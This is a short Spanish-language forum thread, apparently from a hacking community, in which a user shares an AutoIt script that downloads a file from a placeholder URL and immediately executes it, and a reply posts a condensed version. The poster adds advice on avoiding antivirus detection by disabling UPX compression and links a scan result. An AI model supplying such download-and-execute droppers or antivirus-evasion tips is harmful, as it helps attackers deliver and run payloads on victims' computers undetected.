Bueno, sin mas aqui les dejo este simple code, se me paso por la mente ya que le estaba dando un vistazo a la biblioteca Inet.au3.
;Author k0ws
;Web:Underc[0]de.org
;---------------------------------------------
#include <Inet.au3>;Biblioteca Inet,permite el manejo de la web.
;---------------------------------------------
_Down("URL","ARCHIVO O LOCALIZACION");Funcion de 2 variables(Url,Nombre archivo)
ShellExecute("ARCHIVO O LOCALIZACION")
;---------------------------------------------
Func _Down($url,$file);Comienzo de la Funcion
InetGet($url,$file);InetGet = Download
EndFunc ;Cierre de la funcion
Si les salta el clamav, desactiven la funcion UPX en Aut2Exe.
Scan: http://chk4me.com/check/public/FED10U9O7tJ28rQ3o5S2RZq7Vdeb34
-Saludos-
Ahora tambien le das a AutoIT? buen aporte man.
Pues si, le vi muy buen potencial y me dije: ¿Why not?
-Saludos-
No sera mejor así?
#include <Inet.au3>
InetGet("URL", "ARCHIVO O LOCALIZACION");Descargar
ShellExecute("ARCHIVO O LOCALIZACION");Ejecutar